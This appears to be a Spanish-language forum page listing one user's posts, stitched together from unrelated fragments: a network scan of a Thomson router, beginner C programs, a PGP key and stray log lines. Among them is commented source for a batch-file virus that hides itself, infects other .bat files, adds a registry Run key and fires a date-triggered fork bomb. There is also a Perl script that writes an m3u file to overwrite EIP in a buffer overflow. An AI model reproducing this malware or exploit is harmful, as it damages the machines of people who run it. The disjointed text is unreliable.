El nombre el topic lo dice todo, habran Dominicanos en este foro? o acaso soy el unico?
saludos
saludos
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menú
-------------------------------------
Scanning 10.0.0.1 [1000 ports]
Discovered open port 443/tcp on 10.0.0.1
Discovered open port 21/tcp on 10.0.0.1
Discovered open port 80/tcp on 10.0.0.1
Discovered open port 23/tcp on 10.0.0.1
Discovered open port 8085/tcp on 10.0.0.1
--------------------------------------
GetRequest,16E,"HTTP/1\.0 401 Unauthorized\r
Server:Apache\r\n
Pragma: no-cache\r\nCache-Control: max-age=0, must-revalidate\r\nConnection: close\r\nContent-type: text/html\r\nWWW-Authenticate: Basic realm=\"Thomson Gateway\"\r\n\r\n
<HEAD>
<TITLE>401 Authorization Required</TITLE>
</HEAD>
<BODY>
<H1>401 Authorization Required</H1>
Browser not authentication-capable or authentication failed.
</BODY>
HTTPOptions,155,"HTTP/1\.0\ 400 Bad Request
Server: Apache
Pragma: no-cache
Cache-Control: max-age=0, must-revalidate
Connection: close
Content-type: text/html
<HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD>
<BODY><H1>400 Bad Request</H1>
Your clientsent a query that this server could not nunderstand.
<P>Reason: Invalid or unsupported method.<P>
</BODY>
After discovery of existing network devices, the UPnP Device Host, along with the udhisapi.dll module, does the following:
1. Announce the device in accordance to UPnP's discovery protocol.
2. Respond to queries for the device's description.
3. Route control requests to the part of the device's code that implement its functions.
4. Maintain event subscriptions to services that the device provides.
5. Send event notifications to subscribers when the state of the device's service changes.
#include <stdio.h>
int main()
{
char a,b;
printf("Which character is bigger?\n");
printf("Type a single character:");
a=getchar();
printf("Type another character:");
b=getchar();
if(a > b)
{
printf("'%c' is greater than '%c'!\n",a,b);
}
else if(b > a)
{
printf("'%c' is greater than '%c'!\n",b,a);
}
else
{
printf("Next time don't press the same character");
}
return(0);
}
#include <stdio.h>
int main()
{
char a,b;
printf("Which character is bigger?\n");
printf("Type a single character:");
a=getchar();
fflush(stdin);
printf("Type another character:");
b=getchar();
if(a > b)
{
printf("'%c' is greater than '%c'!\n",a,b);
}
else if(b > a)
{
printf("'%c' is greater than '%c'!\n",b,a);
}
else
{
printf("Next time don't press the same character");
}
return(0);
}
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/****/public_html/*******.php on line 68
::*************************************************************
::* nombre:f_to -- payload:si [fork-bomb] -- infeccion:si
::* tipo:.bat infector -- Anti AV tech:no -- propagacion:no
::*========================================
::*=Este codigo fue creado con fines autodidacticos solamente
::*=el autor del mismo(osea yo) no tomara responsabilidad de
::*=ningun problema causado como resultado de su ejecucion
::*==================n3t_3rr0r@hushmail.com==
::*************************************************************
::@echo off
::salta al disco C:
cd\
::si existe el directorio "placenta" salta a una etiqueta que termina su ejecucion sino salta a otra etiqueta para continuar su ejecucion
if exist placenta (
goto _eof
) else (
goto _cnt
)
:_cnt
::crea una carpeta para alojarse
mkdir placenta
::le da attributos oculto/solo lectura/sistema
attrib +h +r +s placenta
::se auto-copia con el nombre f_to
copy %0 > c:\placenta\f_to.bat
::toma atributos de lectura y systema
attrib +r +s c:\placenta\f_to.bat
::se asocia a la extension .avi
assoc .bat=avifile
::agrega una llave al registro para garantizar ejecucion durante el proximo inicio
reg add HKLM\Microsoft\Windows\CurrentVersion\Run /v SysMgr /t Reg_SZ /d C:\placenta\f_to.bat
::payload - si la fecha es igual o mayor que 13-12-13 salta a la etiqueta para activar el payload
if %date% GEQ 13-12-13 (
goto _pyld
) else (
goto _eof
)
::busca archivos .bat y los infecta
for /R %%i in (*.bat) do copy %0 %%i
::y luego le da atributos de sistema/oculto
for /R %%i in (*.bat) do attrib +s +h %%i
:_pyld
:_fb
start %0
goto _fb
:_eof
exit /B
#include <stdio.h>
#include <stdlib.h>
int main()
{
char feet[2];
int msr;
printf("Di tu altura en pies:");
gets(feet);
msr=atoi(feet);
if(msr>5) printf("Eres mas alto que yo!.\n");
if(msr<5) printf("Soy mas alto que tu!\n");
if(msr==5) printf("Somos de la misma altura!!.\n");
return(0);
}
eco apagado;
:chck_size
si archivo.bat %size% == %variable-size%;
hacer (esto) delocontrario hacer (esto-otro);
:fda
my $file= "eipcrash.m3u";
my $junk= "A" x 26094;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created successfully\n";
#include <stdio.h>
int main()
{
char key;
printf("Press any key on your keyboard:");
key=getchar();
printf("You pressed the %c key\n",key);
printf("Its ASCII value is %d.\n");
return(0);
}
#include <stdio.h>
int main()
{
float val1,val2; /* declaro las variables que almacenaran los numeros/valores con que se va a trabajar */
char c; /* declaro la variable que almacenara el signo/operador '+','*','/' o '-' */
char op; /* declaro la variable que usare para las opciones */
puts("Elige una opcion:"); /* le digo al usuario cuales son las opciones disponibles */
puts("1 = Sumar");
puts("2 = Restar");
puts("3 = Multiplicar");
puts("4 = Dividir");
op=getchar(); /* le paso los parametros de la variable o a la funcion getchar() */
if(op == '1'); /* si o igual a '1' */
puts("As elegido sumar"); /* informo al usuario la opcion que ha elegido */
scanf("%f%c%f",&val1,&c,&val2); /* almaceno los numeros/valores y el signo operador */
if(c == '+'); /* lee el signo/operador y si es igual a + que haga lo de abajo */
printf("%f",val1 + val2); /* y finalmente realizo la operacion elegida he imprimo el resultado */
op=getchar();
if(op == '2'); /* lo mismo que arriba xD */
puts("As elegido restar!");
scanf("%f%c%f",&val1,&c,&val2);
printf("%f",val1 - val2);
op=getchar();
if(op == '3');
puts("As elegido multiplicar!");
scanf("%f%c%f",&val1,&c,&val2);
if(c == '*');
printf("%f",val1 * val2);
op=getchar();
if(op == '4');
puts("As elegido dividir!");
scanf("%f%c%f",&val1,&c,&val2);
if(c == '/');
printf("%f",val1 / val2);
return(0);
}
1 = Sumar
2 = Restar
3 = Multiplicar
4 = Dividir
1
As elegido sumar
22 + 30
21.999986As elegido restar!
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.12 (GNU/Linux)
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
rgdqoUcw2Po9aJa8CFjvvR3e
=pTti
-----END PGP PUBLIC KEY BLOCK-----
--SSLID--7553763c16cfb17ec4ca741a26cde1c7;--LOCATION--root;
--LOCAL--10.0.0.68:23044;--EXT--190.167.91.103:23044;
#include <stdio.h>
int main()
{
char hello[5];
char world[6];
printf("Como se dice \"hola\" en ingles?.\n");
scanf("%s",hello);
printf("Como se dice \"mundo\" en ingles?.\n");
scanf("%s",world);
printf("En ingles \"Hola mundo\" se dice %s %s!!.",&hello,&world);
}